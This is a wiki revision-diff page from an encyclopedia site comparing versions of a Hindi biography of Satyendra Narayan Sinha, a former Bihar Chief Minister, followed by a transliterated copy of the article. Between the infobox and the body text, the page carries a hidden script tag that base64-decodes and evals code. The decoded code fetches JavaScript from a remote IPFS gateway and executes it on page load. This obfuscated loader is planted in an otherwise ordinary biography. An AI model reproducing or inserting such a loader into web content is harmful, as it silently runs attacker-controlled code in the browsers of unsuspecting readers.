Difference between revisions of "सत्येन्द्र नारायण सिंह"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 3: Line 3:
 
|पूरा नाम=सत्येन्द्र नारायण सिन्हा
 
|पूरा नाम=सत्येन्द्र नारायण सिन्हा
 
|अन्य नाम=छोटे साहब
 
|अन्य नाम=छोटे साहब
|जन्म=१२ सितम्बर, १९१७
+
|जन्म=[[१२ सितम्बर]], [[१९१७]]
 
|जन्म भूमि=[[मगध मंडल]], [[बिहार]]
 
|जन्म भूमि=[[मगध मंडल]], [[बिहार]]
 
|अविभावक=
 
|अविभावक=
Line 15: Line 15:
 
|नागरिकता=[[भारतीय]]
 
|नागरिकता=[[भारतीय]]
 
|प्रसिद्धि=
 
|प्रसिद्धि=
|पार्टी=[[भारतीय राष्ट्रीय कांग्रेस]]
+
|पार्टी=[[भारतीय राष्ट्रीय कांग्रेस|कांग्रेस]] ([[1969]]), कांग्रेस-ओ (1969–[[1977]]), जनता पार्टी
 
|पद=बिहार के [[मुख्यमंत्री|पूर्व मुख्यमंत्री]]
 
|पद=बिहार के [[मुख्यमंत्री|पूर्व मुख्यमंत्री]]
 
|भाषा=
 
|भाषा=
Line 34: Line 34:
 
}}
 
}}
  
सत्येन्द्र नारायण सिन्हा एक [[भारत|भारतीय]] राजनेता है और [[बिहार ]] के [[मुख्यमंत्री]] रह चुके है। प्यार से लोग उन्हें '''''छोटे साहब'' ''' कहते थे।वे भारत के स्वतंत्रता सेनानी,राजनीतिज्ञ,सांसद,शिक्षा मंत्री तथा बिहार राज्य के मुख्यमंत्री रहे हैं। 
+
सत्येन्द्र नारायण सिन्हा एक [[भारत|भारतीय]] राजनेता है और [[बिहार ]] के [[मुख्यमंत्री]] रह चुके है। प्यार से लोग उन्हें '''''छोटे साहब'' ''' कहते थे।वे भारत के स्वतंत्रता सेनानी,राजनीतिज्ञ,सांसद,शिक्षा मंत्री तथा बिहार राज्य के मुख्यमंत्री रहे हैं।वह 72 वर्ष की आयु में मुख्यमंत्री  बने थे। इसके पूर्व 1977 मे उन्होंने मुख्यमंत्री बनने की कोशिश की परंतु असफल रहे।वस्तुत: छोटे साहब इतने भाग्यशाली नहीं रहे और वर्षों तक [[बिहार ]] के वरिष्ठतम नेता होने के बावज़ूद उन्हें मुख्यमंत्री नहीं बनाया गया।   
==व्यक्तिगत जीवन==
 
 
==राजनीतिक जीवन==
 
==राजनीतिक जीवन==
उन्होंने छठे और सातवें दशक में [[बिहार]] की राजनीति में निर्णायक भूमिका निभायी। उन्होंने राजनीति के लिए मानवीय अनुभूतियों को तिलांजलि दे दी,शिक्षा मंत्री के रूप में शैक्षणिक सुधार किया, साथ ही [[मगध]] [[विश्वविद्यालय]] की स्थापना की।वे देश में अपनी सैद्धांतिक राजनीति के लिए चर्चित हुआ करते थे।छोटे साहब ने बिहार के विकास में अग्रणी भूमिका निभाई।
+
[[स्वतंत्रता संग्राम]] में भागीदारी के बाद देश की आज़ादी के समय राष्ट्रीय राजनीति में इनका नाम वज़नदार हो चुका था।लेकिन सत्येन्द्र नारायण सिन्हा की प्राथमिक रुचि राज्य की राजनीति में ही थी।यही कारण है कि वे [[1961]]में बिहार के शिक्षा मंत्री बने जो उप मुख्यमंत्री के हैसियत में थे।।उन्होंने छठे और सातवें दशक में [[बिहार]] की राजनीति में निर्णायक भूमिका निभायी। उन्होंने राजनीति के लिए मानवीय अनुभूतियों को तिलांजलि दे दी,शिक्षा मंत्री के रूप में शैक्षणिक सुधार किया, साथ ही [[मगध]] [[विश्वविद्यालय]] की स्थापना की।वे देश में अपनी सैद्धांतिक राजनीति के लिए चर्चित हुआ करते थे।छोटे साहब ने बिहार के विकास में अग्रणी भूमिका निभाई।
  
 
==संबंधित लेख==
 
==संबंधित लेख==

Revision as of 18:26, 17 June 2011

satyendr narayan sianh
poora nam satyendr narayan sinha
any nam chhote sahab
janm 12 sitambar, 1917
janm bhoomi magadh mandal, bihar
mrityu 2006
mrityu sthan patana
nagarikata bharatiy
parti kaangres (1969), kaangres-o (1969–1977), janata parti
pad bihar ke poorv mukhyamantri
shiksha snatak, bi. el., qanoon mean mastar digri

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

satyendr narayan sinha ek bharatiy rajaneta hai aur bihar ke mukhyamantri rah chuke hai. pyar se log unhean chhote sahab kahate the.ve bharat ke svatantrata senani,rajanitijn,saansad,shiksha mantri tatha bihar rajy ke mukhyamantri rahe haian.vah 72 varsh ki ayu mean mukhyamantri bane the. isake poorv 1977 me unhoanne mukhyamantri banane ki koshish ki parantu asaphal rahe.vastut: chhote sahab itane bhagyashali nahian rahe aur varshoan tak bihar ke varishthatam neta hone ke bavazood unhean mukhyamantri nahian banaya gaya.

rajanitik jivan

svatantrata sangram mean bhagidari ke bad desh ki azadi ke samay rashtriy rajaniti mean inaka nam vazanadar ho chuka tha.lekin satyendr narayan sinha ki prathamik ruchi rajy ki rajaniti mean hi thi.yahi karan hai ki ve 1961mean bihar ke shiksha mantri bane jo up mukhyamantri ke haisiyat mean the..unhoanne chhathe aur satavean dashak mean bihar ki rajaniti mean nirnayak bhoomika nibhayi. unhoanne rajaniti ke lie manaviy anubhootiyoan ko tilaanjali de di,shiksha mantri ke roop mean shaikshanik sudhar kiya, sath hi magadh vishvavidyalay ki sthapana ki.ve desh mean apani saiddhaantik rajaniti ke lie charchit hua karate the.chhote sahab ne bihar ke vikas mean agrani bhoomika nibhaee.

sanbandhit lekh


bahari k diyaan

shreni:bihar shreni:bihar ke mukhyamantri shreni:mukhyamantri shreni:rajaneta shreni:jivani sahity shreni:prasiddh vyaktitv shreni:prasiddh vyaktitv kosh shreni:charit kosh shreni:rajaniti kosh